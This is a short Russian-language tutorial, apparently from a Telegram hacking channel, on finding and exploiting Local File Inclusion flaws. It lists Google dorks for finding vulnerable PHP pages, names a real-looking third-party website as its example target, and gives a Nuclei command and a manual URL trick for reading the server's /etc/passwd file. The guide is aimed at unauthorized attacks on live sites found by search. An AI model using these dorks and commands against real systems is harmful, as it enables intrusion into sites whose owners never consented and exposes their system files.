Находим и эксплуатируем LFI (Local File Inclusion) используя гугл дорки
Автор - https://admpanel_s.t.me
1. Что же такое LFI (Local File Inclusion)? -
LFI (Local File Inclusion) - это тип уязвимости веб-приложений, которая позволяет злоумышленнику читать локальные файлы на сервере, к которому у него нет прямого доступа. Это происходит, когда веб-приложение использует параметры (e.g - ?page=index.php) для вывода файлов, но не валидирует их должным образом
2. Поиск сайтов с потенциальной уязвимостью -
Несколько гугл дорков которые можно использовать для поиска:
inurl:"?=contact.php" inurl:index.php
inurl:"?page=" inurl:index.php
inurl:"?file=" inurl:index.php
3. Эксплуатация -
Для примера мы получим содержимое файла /etc/passwd. Возьмем первый из списка сайт - https://www.ravagedband.com/index.php?page=contact.php.
Я предпочитаю использовать Nuclei (sudo apt install nuclei) для эксплуатации этой уязвимости.
Команда, с помощью которой мы получим верный путь к файлу /etc/passwd:
nuclei -target "url" -tags lfi -no-mhe
-target: URL-адрес цели.
-tags lfi: указывает, что мы хотим эксплуатировать LFI.
-no-mhe: отключает вывод дополнительной информации о запросе.
Либо же вручную добавляем в URL /etc/passwd (это работает не всегда).